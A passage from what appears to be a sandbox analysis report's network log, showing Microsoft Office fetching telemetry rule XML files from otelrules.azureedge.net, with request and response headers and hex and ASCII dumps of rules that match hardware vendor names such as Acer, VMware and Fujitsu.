                                                                                                                                                      x-azure-ref: 20241204T125905Z-1746fd949bdnq7x2hC1EWRpxr000000000yg00000000c2y4
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      40192.168.2.44980013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:05 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:05 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 407
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                      x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125905Z-1746fd949bdkw94lhC1EWRxuz400000001c0000000008cp3
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      41192.168.2.44980713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:07 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:07 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 415
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                      x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125907Z-1746fd949bd6zq92hC1EWRry48000000015g000000008gbq
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      42192.168.2.44980513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:07 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:07 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 469
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                      x-ms-request-id: b5189c33-801e-008c-34cb-457130000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125907Z-1746fd949bdlnsqphC1EWRurw0000000016g000000000474
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:07 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      43192.168.2.44980613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:07 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:07 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 477
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                      x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125907Z-1746fd949bdnq7x2hC1EWRpxr00000000100000000009w85
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:07 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      44192.168.2.44980813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:07 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:07 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 464
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                      x-ms-request-id: 431871c3-501e-0047-55cc-45ce6c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125907Z-1746fd949bdnq7x2hC1EWRpxr0000000013g0000000057ng
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:07 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      45192.168.2.44980913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:07 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:07 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 494
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                      x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125907Z-1746fd949bdwt8wrhC1EWRu6rg00000001bg000000008py4
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:08 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      46192.168.2.44981213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:09 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:09 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 404
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                      x-ms-request-id: 1e40fce6-401e-0078-1bd2-454d34000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125909Z-1746fd949bdjzh7thC1EWR3g64000000016g000000009ka9
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:10 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      47192.168.2.44981013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:09 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:09 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 419
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                      x-ms-request-id: 1b86d58a-f01e-0071-54ce-45431c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125909Z-1746fd949bdlnsqphC1EWRurw00000000140000000004wgu
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      48192.168.2.44981113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:09 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:09 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 472
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                      x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125909Z-1746fd949bd6ztf6hC1EWRvq2s00000000xg000000004ray
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:10 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      49192.168.2.44981313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:09 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:09 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 468
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                      x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125909Z-1746fd949bdjzh7thC1EWR3g64000000018g000000007q78
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
